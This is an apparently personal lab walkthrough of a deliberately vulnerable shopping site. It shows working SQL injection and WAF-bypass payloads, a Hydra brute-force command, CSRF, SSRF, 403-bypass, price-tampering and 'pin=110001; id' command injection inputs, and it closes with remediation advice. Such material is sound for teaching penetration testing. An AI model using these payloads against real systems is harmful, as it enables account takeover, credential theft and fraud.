October 9, 2026
VULNERABLE SHOPPING
Introduction
By Dhanush4N6
6 min read
VULNERABLE SHOPPING
VulnerableShopping.in is an intentionally vulnerable e-commerce web application created for practicing and demonstrating web application penetration testing techniques.
Link to Download this Target:-"https://github.com/Dhanush4N6/VulnerableShopping.in".
In this walkthrough, I will demonstrate the vulnerabilities I identified while testing the application from an attacker's perspective. The walkthrough includes the following attacks:
1. Sensitive Data Exposure
2. SQL Injection โ Login
3. SQL Injection โ WAF Bypass
4. Reflected XSS
5. Stored XSS
6. Brute Force / Missing Account Lockout
7. IDOR โ Unauthorized Order Access
8. Price Manipulation
9. CSRF โ Email Change
10. Unrestricted File Upload & Directory Listing
11. 403 Bypass โ Admin Panel
12. Missing Function-Level Access Control
13. SSRF
14. Open Redirect
15. Command Injection
The testing was performed against my own controlled lab environment. The objective was to identify, validate, and document security vulnerabilities from an attacker's perspective.
Gobuster
Gobuster is a high-performance command-line tool used in cybersecurity to discover hidden directories, files, subdomains, and virtual hosts via wordlist brute-forcing.
Command: gobuster dir -w /usr/share/dirb/wordlists/common.txt -u http://192.168.68.121:5000/
Sensitive Data Exposure
Open terminal: curl http://vshop.in:5000/api/users
See all 21 users with plaintext passwords in JSON.
Login using Username: arjun01 Password: Arjun@123
Login using Username: admin Password: admin123
SQL Injection โ Login
Go to http://10.39.76.191:5000/login
Username: ' or 1=1- โ & Password: Any
Logs you in as the first user (arjun01)
Method 2:
Username: ' UNION SELECT id,username||':'||password,role FROM users โ
Password: Anything
You'll see username:password rendered
SQL Injection Bypassing the WAF
Try http://vshop.in:5000/?q=' OR 1=1 โ Result: 403 Blocked
Run website in browser
Capture the request in Burp and send to repeater
Edit the request GET /?q=%2527%2520%2575nion%2520%2573elect%25201%252c2%252c(%2573elect%2520group_concat(username%257c%257c%2527:%2527%257c%257cpassword)%2520%2566rom%2520users)%252c4%252c5%252c6%252d%252d%2520a HTTP/1.1 and send
Right click on response > request in browser > copy url
Paste the copied URL in Browser
Reflected XSS
Visit: http://10.0.2.15:5000/?q=
Alert box fires on the search results page.
Stored XSS
Login as any user
In the Review field, Enter: & Submit the review.
Refresh/reopen the product page
For confirmation login as another user and check the same product
Brute Force
Prepare username and password lists: username.txt & password.txt
Run Hydra: hydra -L username.txt -P password.txt -s 5000 10.39.76.191 http-post-form "/login:u=^USER^&p=^PASS^:Invalid credentials"
IDOR(Insecure Direct Object Reference )
IDOR happens when an application lets you access someone else's data just by changing an ID in the URL or request, without checking whether you are authorized to access that object
Login as arjun01 โ My Orders โ note URL /order/1.
Change URL to /order/2 โ rohit02's order with his full card number shows
Price Manipulation
Go to any product you want to perform price manipulation attack
Turn Burp intercept ON, submit "Add to Cart"
In the intercepted POST, change hidden field price=3499 โ price=349, forward it
Cart shows 349
CSRF(Cross Site Reference Forgery)
Inspect http://vshop.in:5000/profile
Create a file csrf.html
Content for the file:
While logged in as arjun01, open csrf.html in the browser
Reload /profile โ email is now hacked@evil.com.
Before
After
Unrestricted File Upload + Directory Listing
Create a test.html file containing
Login โ Profile โ Upload avatar โ choose test.html containing โ upload
Visit http://vshop.in:5000/static/uploads/
Open /static/uploads/test.html so XSS executes from VShop's own domain
403 Bypass on Admin Panel
Visit http://10.39.76.191:5000/admin โ 403 Forbidden.
In Burp Repeater, add header: X-Forwarded-For: 127.0.0.1 โ send
Request in Browser
Missing Function-Level Access Control
In kali terminal: curl -X POST http://vshop.in:5000/admin/product/add -d "name=PWNED&cat=Hack&price=1&desc=no-auth-check" run this command
A product is injected into the catalog
Fake product visible to everyone
SSRF( Server Side Request Forgery )
Visit: http://vshop.in:5000/import-product?url=http://127.0.0.1:5000/api/users
The server fetches its own internal API and renders the user data with passwords.
Open Redirect
Send the crafted URL http://vshop.in:5000/logout?next=https://example.com
The application logs out the current user and then redirects the browser to https://example.com
Command Injection
Go to http://10.39.76.191:5000/check-pincode
Submit: pin=110001; id โ page output shows uid=1000(kali) gid=1000(kali)
Method 2:
Start the listener. After the payload is executed successfully, the listener displays a connection from the vulnerable server and provides the interactive shell.
Send the reverse-shell payload through the vulnerable pin parameter.
THE END OF THE TASK
Security Measures
The following security measures help prevent common web application vulnerabilities:
- SQL Injection: Use parameterized queries and prepared statements instead of dynamically constructing SQL queries.
- Cross-Site Scripting (XSS): Apply context-aware output encoding and sanitize untrusted HTML.
- IDOR: Verify object ownership and authorization on every request.
- CSRF: Implement CSRF tokens and appropriate cookie security settings.
- SSRF: Validate and allowlist permitted URLs, block internal network destinations, and restrict outbound requests.
- Command Injection: Avoid shell commands where possible and validate all user inputs.
- Broken Access Control: Enforce server-side role-based access control for protected resources and administrative functions.
- File Upload: Validate file types and content, generate safe filenames, and store uploads outside executable directories.
- Open Redirect: Allow only trusted redirect destinations.
- Sensitive Data Exposure: Never expose passwords, session tokens, or sensitive user information through APIs. Hash passwords securely.
- Brute-Force Attacks: Apply rate limiting, login throttling, and appropriate account protection mechanisms.
- Price Manipulation: Calculate prices and totals on the server instead of trusting client-submitted values.
- Information Disclosure: Disable debug mode in production and return generic error messages.
- Hardcoded Secrets: Store secrets securely in environment variables or a secrets manager and rotate exposed credentials.
- Session Security: Use secure, HttpOnly, and SameSite cookie attributes, and regenerate session identifiers when appropriate.
General Best Practices
Keep dependencies updated, use HTTPS, follow the principle of least privilege, log security-relevant events, and perform regular security testing. Validate findings and verify that security fixes work as intended.
You can Follow this Page For More Targets and More Walkthroughs to Learn Pen-Testing With Me.
G00D Bye!!!